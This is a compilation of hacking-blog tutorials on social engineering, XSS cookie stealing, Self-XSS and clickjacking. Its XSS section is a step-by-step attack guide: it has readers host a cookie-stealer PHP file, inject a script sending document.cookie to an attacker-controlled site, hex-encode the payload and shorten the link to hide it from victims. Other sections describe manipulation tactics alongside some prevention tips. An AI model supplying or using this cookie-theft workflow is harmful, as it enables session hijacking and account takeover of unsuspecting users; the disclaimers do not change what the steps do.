The Art of Human Hacking -Social Engineering(SE) tutorial series

Hello BTS readers, here we come with an interesting tutorial written by my friend Mr.Ashish Mistry who is the founder of Hcon and author of 'HconSTF ' project.


Hello all,

after a long time I am again started writing, In a hope that my believe in “sharing the spirit of learning” fulfills well. So from today I am going to write series of tutorials on my favorite topic, 'Social Engineering' (SE).

starting from small intro to very basics of what SE is, why should you learn and use it, How it works, and as we go on further in this series, we will look at 'leveraging SE into penetration testing'.

Disclaimer: All the examples used in the tutorials series are some of my own and some of from the random pick from internet and Social-net, so if any of the example accidentally meets your situation than, no one can held me responsible for anything in any regards what so ever. This are just for examples and totally educational purpose and I am not in an intention to offense anyone or anything.
This tutorials are for educational purpose only, only you as reader is responsible for whatever you do with this material published here and not the author and not the site.

So lets we begin with the first tutorial on SE,

what is social engineering???

Its an art of manipulating humans.
In more easy words 'tricking people so, they do what YOU want from them or get done by them'.

got confused??

Lets take one example:

suppose you go to some toyshop with your child, and your child want a toy car, so he asks to the sales person to show a car or any one he has may be seen from the display. So that sales person shows that car or always starts with a costly car so when the boy saw the car he asks for to take that car only because the sales person showed some features like lights and remote and all. But the toy car is too costly for your this month's budget and boy wants it anyhow, so you try to divert the child to some other little more in your budget car, as he is a small child so he does not listens to you and at the end of all this,
either you buy that costly car child wanted or he didn't get anything or some other car.

Now you might ask me “So whats new in this? Its very normal every child does it right???” but my point of this example is to explain a perfectly crafted and executed 'social engineering attack' in our day to day life.
In above example the social engineer was the shop's sales person who used the child to sell a costly car and have more money from you.

Basically the sales person targeted the nature of that child because he knows that once it is showed what a child wants than its very difficult for the parents to divert the child so he can sell as HE wanted.

So if you understand basic exploitation terms than,

• Attacker = the sales person
• Vulnerability (weakness) = child (actually the obvious nature)
• Exploit (trick) = showing more costly car and showing more features of it to gain more attention of the child
• Payload (purpose) = more money from you
• Target = yes you guessed it right its YOU :)

Lets take another example:

This one is simple but real world example from Facebook,
a person shared this image of a quote from honorable Mr. APJ Abdul kalam.

Its good right ?? he is proud of him or liked the quote right ??
but lets now try to understand it by SE point of view.
there are some things to note down in the photograph
1. on the image - one website address is there
2. below the image again the website address is written

First let me tell you that the web address was not from any government site but a private product trading site which is totally unrelated to what the image is and marking the image with it is such a disrespect done by the person, anyways
so why anyone would do like this ??

a very simple but cleaver kind of SE here

• Attacker = who initially edited this photo with web address
• Vulnerability (weakness) = human nature of sharing and liking good photos/quotes
• Exploit (trick) = the edited photo which has quote
• Payload (purpose) = marketing of his web site, and reaching some more audience for business for FREE
• Target = any one on Facebook who shares this photo

Another noticeable point is that if you see anything which is liked by your mind, it gets stored somewhere in your mind so when anyone around you ask or talk about any property or trading things, your mind might flashes about this site.
now after this example lets refine and add to our previous simple definition of SE.

"Its an art of manipulating people so that they do as you want or give you what you want from them. Without any kind of physical offense, Its a whole psychological process of targeting other peoples mind to gain their TRUST and exploiting it and using human weaknesses against target by crafting SE attacks by the kind of work we want to get done by others"

Hopefully now you must have got the idea of social engineering (SE), and some things to start understanding and observing it. but yes every human and its psychological behavior will be different, by studying your target and crafting attack according to you goal will going to give more success.for this one of the key thing is observation and quick responsive abilities if the attacker or social engineer.

So who can be considered as social engineers??

it can be anyone from your relative/friend, convincing you to do or believe what they say even if you don't want do do it or believe it.

It can be sales person, marketing parsons, thief/con artist, your boss, penetration testers, forensics experts or anyone around you !!

More on it, its not a new thing but it used from centuries by different people, even if you consider any historical persons from your nation.

Think on it, might be you had been social engineered by someone??? some where ??

Thats all for this first introductory tutorial.
If you have any Questions or want to give any feedback or anything you want to get explained in this tutorial series than please post in comments.

Article author: Ashish Mistry
Article license: Social Engineering tutorials series by Ashish Mistry is licensed under a Creative Commons Attribution-NonCommercial-NoDerivs 3.0 Unported License.

How to Fetch Username and Password by Social Engineering Technologies?

Security Researcher Ankit Sharma,from God of hackers group(GOH) presented a video tutorial which explains how to do social engineering attacks using Backtrack.

Social engineering is commonly understood to mean the art of manipulating people into performing actions or divulging confidential information. While it is similar to a confidence trick or simple fraud, the term typically applies to trickery or deception for the purpose of information gathering, fraud, or computer system access; in most cases the attacker never comes face-to-face with the victims.

"Social engineering" as an act of psychological manipulation was popularized by hacker-turned-consultant Kevin Mitnick. The term had previously been associated with the social sciences, but its usage has caught on among computer professionals.

How to do Cookie Stealing with Cross site Scripting Vulnerability ? : XSS Tutorials

Hope, you are now familiar with XSS vulnerability (if you don't know what it is, read the beginners xss tutorial). It is my Fourth article about the XSS Vulnerability Testing(PenTesting)..! Today i am going to explain how an attacker exploit XSS vulnerability and steal cookie from users.

Warning!!!

BTS does not take responsibility, if anyone, tries these hacks against any organization or whatever that makes him to trespass the security measures and brings him under the legal prosecution. This tutorial is intended for the improvement of security and for PenTesting,  investigations by legal security agencies.

Requirements:

• A cookie Stealer code : Get it from here
• Free Web hosting service
• Basic Knowledge about XSS
• Basic Knowledge about Computer Cookies

Cookie stealing is the process of exploiting the XSS vulnerability (Non-persistent/persistent) and steal the cookie from the victim who visit the infected link. These cookie will be used to compromise their accounts.

Step 1: Creating Cookie Stealer PHP file

Get the Cookie stealer from the link i mentioned.  In that post, i have explained three versions of cookie stealer.  We are going to use the third version.

• Copy the code.
• Open Notepad and paste the code
• Save the file with .php extension
  Eg: Stealer.php

Now create New file and save it as log.txt (leave it as blank). Don't change the name , this is the file name what we give in php file.

Now you will have two files;
1. Stealer.php
2. log.txt

What these two files do exactly?
The above Stealer.php file get ip address,cookie and stores the data in log.txt file.
The log.txt has cookies , ip address details.

Step 2: 
Register in a free web-hosting service and login into your cpanel.
Now open the File Manager in cpanel.
Upload the Stealer.php and log.txt to root folder or public_html folder.

Now the stealer will be at hxxp://www.YourSite.com/Stealer.php .

Step 3: Exploiting the XSS Vulnerability
So Far , we have sharpened our saw.  Now we are going to use it.
Once you set up everything and find a Vulnerable site,then inject the following code in the Vulnerable sites.

<script>location.href = 'http://www.Yoursite.com/Stealer.php?cookie='+document.cookie;</script>

For example:
hxxp://www.VulnerableSite.com/index.php?search=<script>location.href = 'http://www.Yoursite.com/Stealer.php?cookie='+document.cookie;</script>

Cookie Stealing with Non-Persistent vs Persistent XSS:
Persistent: if you inject this code in Persistent XSS vulnerable site, it will be there forever until admin find it.  It will be shown to all users.  So attackers don't need to send any link to others.  Whoever visit the page, they will be vicim.

Non-Persistent:
In case of Non-persistent attack, attacker will send the link to victims. Whenever they follow the link, it will steal the cookie.  Most of sites are vulnerable to Non-persistent XSS .

In Non-persistence, Attackers will send the injected link victims.
For example:
hxxp://www.VulnerableSite.com/index.php?search=<script>location.href = 'http://www.Yoursite.com/Stealer.php?cookie='+document.cookie;</script>

The above link is clearly shows the scripts.  Hackers can Hex-encode this script  so that victim can't see the script.
For Example:

hxxp://www.VulnerableSite.com/index.php?search=%3c%73%63%72%69%70%74%3e%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%20%3d%20%27%68%74%74%70%3a%2f%2f%77%77%77%2e%59%6f%75%72%73%69%74%65%2e%63%6f%6d%2f%53%74%65%61%6c%65%72%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3b%3c%2f%73%63%72%69%70%74%3e

Still , the link look long. The attacker use one more trick to hide the long url i.e url shortening sites. There are lot of sites that shorten the long url into tiny url.

For example:
hxxp://www.tinyexample.com/twrwd63

Once the victim follow the link, his cookie will be stored in log.txt file.

How to be Secure from this attack?

• Use No-Script Addon. This is best protection to stay away from XSS 
• Never Click the Shorten url
• Sometime you may want to follow the shorten link.  If so, then clear all cookies in your browser and visit through Proxy or VPN(it will hide your ip)
• (Later We will cover security tips for site admin , so stay tuned)

Self-XSS (Cross Site Scripting) ~ Social Engineering Attack and Prevention

Last time , I have explained about the Clickjacking attack and prevention.  Today,  i am going to explain about the Self-XSS(Cross Site Scripting) Attack

What is Self-XSS?

Self-XSS is one of the popular Social Engineering Attack used by Attackers to trick users into paste the malicious code in browser.  Results in attacker accessing to the whatever website you visit. Usually scammers use this attack for tricking users to buy products or get money through online survey .

Recently, Hackers Attacked Facebook with explicit hardcore porn images. Facebook says it might be self-Xss Attack .

Javascript can be executed in browser url bar.
For example , enter the following code in your browser:

javascript:alert('BreakTheSecurity');

This will show a pop up box with "BreakTheSecurity".  An attacker can use this for malicious purpose. He can steal Confidential data, cookies, redirect to malware sites and more.
For Eg:
Entering the following code will display the cookies in your browser:

javascript:alert("Cookies:"+document.cookies+"  "+"\n By \n BreakTheSecurity");

The above code is not going to anything maliciously other than displaying the cookies.  But an attacker can extend the script so that it can take advantage your data.

Security Tips from BreakTheSecurity:

• Use NoScript add on that will prevent javascript running in your browser.
• Don't click the shorthand urls for Example: bit.ly/55ewEb?22.  This may redirect to an infected sites. 

Aware of Social Engineering:

• If anyone ask you(even if he is your friend) to paste the scripts in browser bar, Never do this mistake.  
• If anyone says "Iphone only $10", Don't eager to click it. 
• If anyone says "1000 shares will cure a baby", Never do this mistake. Facebook shares never help to get money or help to cure baby.
• Read our EHN spam report to know the latest updates about the facebook scams.

God give us the Sixth Sense,Use it and think before you click any links or following the other instructions. 

What is Clickjacking Attack? How to Prevent? | UI Redressing

Will answering simple maths quiz delete your Social Network account?  If your answer is "No", then check this news Linkedin Clickjacking Vulnerability and come back.  Will visiting a website turn on your webcam? The answer is "Yes".  Check this Flash player clickjacking vulnerability.

If you read above news completely, It will be easy for you to understand  what is clickjacking.  Ok, lets continue to our Article.

Clickjacking also known as UI Redressing,is one of Malicious Technique tricking users to click the button/image that will run hidden malicious script from another site.

An attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on another page when they were intending to click on the the innocuous page. Thus an attacker hijack the click to another website.  That's why it is known as Clickjacking(Click+Hijacking).  The term "clickjacking" was coined by Jeremiah Grossman and Robert Hansen in 2008.

Example:

Lets take the real time example "Linkedin clickjacking vulnerability.

The above image may look like simple maths problem.  Once you click the submit button, it will delete your Linkedin account(if you are logged in) without asking any questions.

Clickjacking Attack can be used for:

• Tricking users to turn on their webcam and microphone using this adobe vulnerability (this security flaw fixed by adobe)
• Getting more Twitter Followers
• Post in your facebook wall.
• Can delete your profile.

Prevention Techniques:

Client Side(Security tips for users):

Flash Player:

Update your Flash Player(old version are vulnerable to Clickjacking). 

Browser Security Addons: 

Noscript:
Noscript is Mozilla add on that provides protection against clickjacking,XSS and other malicious scripts.  Noscript is available for mobiles also.

Comitari Web Protection Suite: Comitari provides client side protection against ClickJacking (aka UI Redressing) attacks. Installed as browser add-on

GuardedID: It is a commercial product which provides client-side clickjack protection for users of IE or Firefox without interfering with the operation of legitimate iFrames

Server Side( For Developers)

Frame Killer:

Framekiller is javascript snippet that can be used in webpage  to avoid inserting frames from different sources.  This can provide security against frame based clikjacking.

Introduction to Social Engineering world | Hack the people

What is Social Engineering?

Social engineering is the act of manipulating people into performing actions or divulging confidential information, rather than by breaking in or using technical cracking techniques.[1] While similar to a confidence trick or simple fraud, the term typically applies to trickery or deception for the purpose of information gathering, fraud, or computer system access; in most cases the attacker never comes face-to-face with the victim.